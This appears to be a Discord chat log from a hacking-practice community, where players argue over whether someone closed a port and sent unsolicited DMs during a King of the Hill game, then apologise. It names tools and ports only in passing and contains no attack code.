koth goin on wanna join

patent forge
#

Anyone up for a KOTH?

ornate token
#

I'll lose anyway, but yeah sure why not?
I'll join asap

patent forge
ornate token
#

Dud, don't close ports
Or is it allowed??

patent forge
#

didn't closed anything πŸ™‚

#

as you text me the rules, you can check them by yourself

#

beeing rude of course doesn't help you in a koth

#

πŸ˜‰

ornate token
#

Rude with wut?!

patent forge
#

check dms πŸ™‚

ornate token
#

!rule 1

pearl gladeBOT
#

Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.

arctic beacon
#

HAHAHAHA

#

mentats >

patent forge
#

yeah sure, you had just accepted a koth invite, and i just asked you if you prefer doing a friendly game

#

what's the point of sending me rules like if I text you for asking kiddie stuff?

#

i was just trying to be nice with you, like with everyone else in this community.

ornate token
#

I accepted the game not the dm

patent forge
#

yeah sure

#

so play

#

you are losing time, nothing closed or patched either (at the moment)

ornate token
#

Then nmap goes wrong only now??

arctic beacon
#

y

#

he is a h4x0r

patent forge
#

or maybe you cannot use nmap

ornate token
#

xD

patent forge
#

there are a lot of ports man

#

just enumerate :9

#

btw i've already patched the node way (of course)

#

following the rules

nova tide
#

Dud, don't close ports
Or is it allowed??
@ornate token which machine and which port?

patent forge
#

i didn't closed anything

#

and i should be able too

#

space jam btw @nova tide

ornate token
#

Spacejam, 3000

patent forge
#

the service is running my hero @ornate token

ornate token
nova tide
#

lemme boot up my VM

ornate token
#

Nmap shows 23, 22, 80, 9999, but 3000 not anymore

patent forge
nova tide
#

killall node closes the port

patent forge
#

didn't do that πŸ™‚

nova tide
#

check the nmap scan you did close the port smh

patent forge
#

can i dm you @nova tide ?

nova tide
#

sure

#

while trying to stop the service

patent forge
#

just moved.

#

i'm leaving this game btw

ornate token
#

Naughty, there's other way in?

patent forge
#

i should follow rules and just kill that.

#

Naughty, there's other way in?
@ornate token of course

nova tide
#

Naughty, there's other way in?
@ornate token Yeah there are

ornate token
#

😁

patent forge
#

@nova tide I didn't even uninstall chattr....

nova tide
#

who i said i did??

patent forge
#

no, i was saying that because you were "trying" to say that i'm cheating

#

of course (following the rules) i was able to kill the node service

nova tide
#

just enumerate :9

#

no, i was saying that because you were "trying" to say that i'm cheating
@patent forge pretty sure i never used the word "Cheating"

tepid hornet
#

@patent forge is just good and quick πŸ˜† and a stickler for rules

nova tide
#

@patent forge is just good and quick πŸ˜†
@tepid hornet fight me blobknife

#

I still want to play with you @tepid hornet πŸ˜›

patent forge
#

@nova tide yeah, my english is pretty bad with arguing

#

so i can't explain very well what i'm trying to say

tepid hornet
#

I still want to play with you @tepid hornet πŸ˜›
πŸ˜… yeah me too

nova tide
#

well forget about what happened before. i joined game after 33 minutes.. now its your turn to get king

#

didn't patch any way in, nothing is closed πŸ™‚

patent forge
#

i'm doing a room rn

#

i know the other way (py)

nova tide
#

you are losing time, nothing closed or patched either (at the moment)

stiff egret
#

Lmao, I clearly missed fun

#

Oi @nova tide

nova tide
#

i jus said your ways are still available.. even node is up.. just get king

#

Oi @nova tide
@stiff egret yo

patent forge
#

@nova tide i just got pissed by this situation

#

I don't like playing this way (not talking about you of course)

nova tide
#

or you can just talk against the people who just started koth?

stiff egret
nova tide
#

I don't like playing this way (not talking about you of course)
@patent forge what way? care to elaborate?

patent forge
#

I think you "know" me, i always ask for friendly koth for learning stuff

#

dmming someone who just accepted a koth invite and get "rule 1" as response, just broke my mood πŸ™‚

nova tide
#

well it is rule.. no one ever said you are allowed to DM anyone who is playing KoTH with you

stiff egret
#

imo, you don't need to DM unless it's some spoiler.

nova tide
#

idk how that ruins your mood πŸ€·β€β™‚οΈ

patent forge
#

yep, but beeing nice is part of the game i think

nova tide
#

you can be nice here. no need to be nice in DMs

patent forge
#

yeah sure

#

i'll never do that again

ornate token
#

Was I harsh?

patent forge
#

i just don't like playing like this

nova tide
#

i will be waiting for you to get in the system πŸ™‚

patent forge
#

@ornate token you are right about dms

#

so sorry if i broke the rules

ornate token
#

I'm sorry aswell for being rude :')

nova tide
#

ayeee ❀️ everyone being nice again partypussy

tepid hornet